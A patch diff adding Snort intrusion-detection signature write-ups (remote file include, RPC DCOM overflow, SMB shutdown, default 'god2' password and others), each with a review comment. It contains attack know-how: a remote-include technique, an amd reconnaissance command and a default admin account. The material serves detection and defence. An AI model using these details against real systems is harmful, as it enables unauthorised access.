+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "summary.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
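Review bot: the Attack Scenarios paragraph and the last paragraph of Detailed Information are the credential boilerplate rather than a description of the remote file include (a request to summary.php with admin_template_path set to a URL on the attacker's host, so the attacker's PHP is included and executed as the web server user). "an exploitation attempt has been attempted" is redundant and "running ona web server" should be "on a". The blank line before "--" is missing after the Sid, Affected Systems and Contributors blocks. Corrective Action should mention allow_url_fopen and allow_url_include set to Off in php.ini as a mitigation independent of the application version.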
--- /dev/null
+++ b/doc/signatures/1720.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1720
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
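Review bot: this is a verbatim copy of the 868.txt body with only the Sid changed, and it still does not name the CGI that the rule matches; without the script name or URI pattern the alert cannot be triaged. Add the matched path and a reference, and fix "running ona web server".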
--- /dev/null
+++ b/doc/signatures/1953.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1953
+
+--
+Summary:
+This event is generated when a request is made to discover the Process ID (PID) of the Remote Procedure Call (RPC) amd.
+
+--
+Impact:
+Information disclosure.  This request can allow an attacker to discover the PID associated with amd.
+
+--
+Detailed Information:
+The amd RPC service implements the automounter daemon on UNIX hosts.  The amd service automatically mounts and unmounts requested file systems.  An attacker can make a request to amd to discover its PID.  Learning the PID may help an attacker guess a range of likely PIDs associated with other running services that are either started before or after amd.  This may facilitate an attack against other running processes.  
+
+--
+Affected Systems:
+Any system running amd.
+
+--
+Attack Scenarios:
+An attacker may request the PID associated with amd.  This information may be used to attack other running processes if the attacker has some means of access to the target host. 
+
+--
+Ease of Attack:
+Simple. Execute the command 'amq -p -T -h hostname/IP'.
+  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
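Review bot: "the Remote Procedure Call (RPC) amd" in the Summary reads awkwardly; "the amd (automounter) RPC service" is clearer. The rationale that a PID "may help an attacker guess a range of likely PIDs" is weak; the practical value of the query is that a successful answer confirms amd is registered with the portmapper and reachable from the source, which is the reconnaissance step that precedes attacks on the daemon itself, and that is what the Detailed Information should say. The whitespace-only line after "Simple. Execute the command 'amq -p -T -h hostname/IP'." should go.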
--- /dev/null
+++ b/doc/signatures/2993.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2993
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a Windows
+system via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a Windows
+system via SMB across the network.
+
+It may be possible for an attacker to manipulate a Windows system
+from a remote location. Shutting down a system may lead to a Denial of
+Service for the target host.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may be able to manipulate a target system using SMB. The
+attacker may gain complete control over the affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
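Review bot: "Impact: Serious." says nothing; the concrete impact is a remote shutdown or reboot, that is a denial of service, by anyone who holds a session with the shutdown privilege on the target. "False Positives: None known." is wrong: "shutdown /m \\host" and other legitimate remote administration produce exactly this traffic, so the entry should advise tuning by source host. The corrective action "Disallow remote registry manipulation" should explain why it is the targeted fix: on Windows systems of this era the remote shutdown call travels over the winreg RPC interface (\PIPE\winreg) hosted by the Remote Registry service, so stopping that service or blocking the pipe stops remote shutdown without turning off file and print sharing entirely.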
--- /dev/null
+++ b/doc/signatures/2805.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2805
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure set_columns
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
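Review bot: the same unjoined template as the other Oracle entry in this patch: "vulnerability in the procedure set_columns" / ". This procedure is included in" / "dbms_repcat." should be one sentence naming the set_columns procedure of the dbms_repcat package, and "Oracle Oracle9i" repeats the vendor. Additional References is empty for what the text calls a known vulnerability; add the Oracle alert and CVE entry from the rule's reference keyword. Note also under Ease of Attack that invoking the procedure needs an authenticated database session, so the alert should be triaged together with the account on that TNS connection.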
--- /dev/null
+++ b/doc/signatures/1451.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1451
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
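Review bot: typo in Detailed Information, "a CGI application running ona web server" should read "on a web server", and "attackers choosing" in both Impact and Detailed Information needs the possessive "attacker's". The Summary refers to "a known vulnerability" but no application or vulnerability is named anywhere in the file and Additional References is empty, so an analyst cannot tell what SID 1451 actually matches; either cite the vulnerability or reword the Summary as generic CGI access monitoring.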
--- /dev/null
+++ b/doc/signatures/2444.txt
@@ -0,0 +1,82 @@
+Rule:  
+
+--
+Sid:
+2444
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in multiple versions of Internet Security Systems software.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible leading to unauthorized 
+access to the affected host. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the way that multiple ISS products parse ICQ
+messages. This can lead to execution of arbitrary code on hosts using
+the affected products.
+
+Due to insufficient bounds checking when ISS products parse protocol
+fields in ICQ SRV_META_USER data, a buffer overflow condition can be
+exploited to give an attacker the opportunity to execute arbitrary code
+and gain unauthorized administrative access to the host.
+
+It is possible that this condition can be exploited without the need for
+an established and valid ICQ session. The attacker could create packets
+originating from a host on port 4000 and send specially crafted data to 
+exploit the condition.
+
+--
+Affected Systems:
+	RealSecure Network 7.0, XPU 22.11 and prior
+	RealSecure Server Sensor 7.0 XPU 22.11 and prior
+	RealSecure Server Sensor 6.5 for Windows SR 3.10 and prior
+	Proventia A Series XPU 22.11 and prior
+	Proventia G Series XPU 22.11 and prior
+	Proventia M Series XPU 1.9 and prior
+	RealSecure Desktop 7.0 ebl and prior
+	RealSecure Desktop 3.6 ecf and prior
+	RealSecure Guard 3.6 ecf and prior
+	RealSecure Sentry 3.6 ecf and prior
+	BlackICE Agent for Server 3.6 ecf and prior
+	BlackICE PC Protection 3.6 ccf and prior
+	BlackICE Server Protection 3.6 ccf and prior
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
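Review bot: Additional References is empty even though Detailed Information describes a specific ISS ICQ SRV_META_USER parsing overflow and Affected Systems lists thirteen product versions with XPU levels; an advisory link would let operators verify which build is deployed. Minor: "Rule:  " and several "-- " separators carry trailing whitespace, and "Apply the appropriate vendor supplied patches" lacks the full stop the preceding sentence has.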
--- /dev/null
+++ b/doc/signatures/100000745.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000745
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Diesel Joke Site" application running on a webserver. Access to the file "category.php" with SQL commands being passed as the "id" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "id" parameter in the "category.php" script used by the "Diesel Joke Site" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Diesel Joke Site
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
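Review bot: the third paragraph of Detailed Information ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server...") is generic credential-checking boilerplate that does not describe an SQL injection attempt; drop it or replace it with text about the "id" parameter, and fix the "ona" typo if it stays. "may indicate that an exploitation attempt has been attempted" is redundant; "may indicate an exploitation attempt" suffices. Affected Systems, "All systems running CGI applications using Diesel Joke Site", should read "All systems running Diesel Joke Site". Formatting: the file opens with two blank lines, and the "--" separators after "100000745" and after the Affected Systems entry lack the blank line used everywhere else in the patch.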
--- /dev/null
+++ b/doc/signatures/1402.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1402
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
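Review bot: Impact reads "Information gathering possible administrator access." and needs punctuation between the two clauses ("Information gathering. Possible administrator access."). "Sid: 1402" puts the value on the heading line, unlike the other files where the number follows on its own line, and it is followed by two blank lines instead of one. Additional References is empty although Corrective Action asks the reader to harden the IIS implementation; a pointer to the relevant hardening or advisory material would make that actionable.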
--- /dev/null
+++ b/doc/signatures/3139.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+3139
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft systems using Server Message Block (SMB).
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+SMB is a client - server protocol used in sharing resources such as
+files, printers, ports, named pipes and other things, between machines
+on a network.
+
+A vulnerability in the Microsoft implementation of SMB exists due to a
+programming error which may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain unauthorized access to the target host.
+
+A malicious attacker can exploit the vulnerability by sending a
+malicious response from a server in response to a client request using
+SMB.
+
+--
+Affected Systems:
+	Microsoft Windows 2003
+	Microsoft Windows 2000
+	Microsoft Windows XP
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message from the server
+containing code of their choosing to be run on the client.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Turn off windows file and print services.
+
+Use Samba as an alternative.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+eEye:
+http://www.eeye.com/html/research/advisories/AD20050208.html
+
+--
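Review bot: the last Corrective Action item, "Use Samba as an alternative.", does not follow from the Detailed Information, which describes a client-side flaw triggered by "a malicious response from a server in response to a client request using SMB"; replacing the server does not remove the exposure of Windows SMB clients, so restricting SMB connections from clients to untrusted networks would fit the described vector better. "Turn off windows file and print services" should capitalise "Windows". Several "-- " separator lines carry trailing whitespace.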
--- /dev/null
+++ b/doc/signatures/3202.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3202
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
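Review bot: typo in Ease of Attack, "Simple. Expoit code exists." should read "Exploit". Additional References is empty for a vulnerability the Summary calls "known" and Corrective Action says is patched; a vendor bulletin link would let analysts check patch status. Detailed Information attributes the overflow to "a malformed request to an RPC port" while Attack Scenarios describes "a request for a file with an overly long filename via a network share"; a sentence tying the two together would make clear that the filename is the malformed RPC input.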
--- /dev/null
+++ b/doc/signatures/3367.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3367
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
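Review bot: this file is a verbatim copy of 3202.txt with only the Sid changed (same Summary, Detailed Information, Affected Systems and Corrective Action). If SID 3367 matches a different request or protocol variant, Detailed Information should state what distinguishes it, otherwise an analyst seeing both events cannot tell them apart. The "Expoit" typo in Ease of Attack is carried over, and Additional References is again empty.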
--- /dev/null
+++ b/doc/signatures/2145.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid: 2145
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in the php application TextPortal. 
+
+--
+Impact:
+Potential administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to supply a known default administrator password for the php application TextPortal.
+
+The default administrator account 'god2' has known, weak passwords that could be used by an attacker to gain unauthorized access to the application.
+
+
+--
+Affected Systems:
+Any host using TextPortal.
+
+--
+Attack Scenarios:
+An attacker can log in to the application using the account god2 and gain administrator access to the site.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Disable the god2 account.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/7673
+
+--
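Review bot: the first Corrective Action item, "Check the php implementation on the host. Ensure all measures have been taken to deny access to sensitive files.", is copied from the IIS file-disclosure write-up (1402.txt) and does not address a default administrator password; changing the god2 password or disabling the account, as the second item says, is the actionable step. "Sid: 2145" puts the value on the heading line and is followed by two blank lines, unlike the other files in the patch. Detailed Information says the account "has known, weak passwords"; if the rule matches those specific strings, say so, since that is what an analyst needs to judge false positives.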
--- /dev/null
+++ b/doc/signatures/1668.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1668
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
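Review bot: this file duplicates 1451.txt word for word apart from the Sid, including the "ona web server" typo and the missing possessive in "attackers choosing". Detailed Information should say which CGI application or request SID 1668 is specific to, and Additional References should cite it; as written the two documents are indistinguishable and give the analyst no way to tell the events apart.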
--- /dev/null
+++ b/doc/signatures/772.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+
+772
+
+--
+Summary:
+This event is generated when the PrettyPark virus attempts to spread.
+
+--
+Impact:
+Possible virus infection. Attempt to spread a virus/trojan.
+
+--
+Detailed Information:
+Prettypark is a Win32 based Internet worm. This spreads through the Internet by attaching itself to email messages.
+
+When the attached file is executed, it checks for the existence of Prettypark in memory, if it is not present it then installs Prettypark. After infecting it sends messages to all the email addresses listed in the address book with an attachment containing the virus.
+
+Prettypark is capable of revealing passwords and connects to IRC channels. System access is possible.
+
+--
+Affected Systems:
+Windows 95, 98 and NT
+
+--
+Attack Scenarios:
+This is virus propogation activity.
+
+--
+Ease of Attack:
+
+Simple.
+
+--
+False Positives:
+
+Possible in certain mail content
+
+--
+False Negatives:
+
+None known
+
+--
+Corrective Action:
+ 
+Use an Anti-Virus tool to remove it.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+http://www.nwinternet.com/~pchelp/bo/prettypark.htm
+--
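Review bot: typo in Attack Scenarios, "This is virus propogation activity." should read "propagation". Formatting differs from the rest of the patch: there is a blank line between "Sid:" and "772", the Ease of Attack, False Positives, False Negatives and Corrective Action headings are each followed by a blank line (Corrective Action by a whitespace-only line), and the final "--" follows the URL without a blank line. False Positives says "Possible in certain mail content" without saying what content triggers the rule; naming the matched attachment name or subject pattern would let operators tune it.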
--- /dev/null
+++ b/doc/signatures/3182.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3182
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
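Review bot: this is the third verbatim copy of the 3202.txt text in this patch (3202, 3367 and now 3182), differing only in the Sid. Each RPC DCOM document should say which request or variant its rule matches so analysts can distinguish the events; the "Expoit" typo in Ease of Attack and the empty Additional References section are repeated here as well.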
--- /dev/null
+++ b/doc/signatures/3282.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3282
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
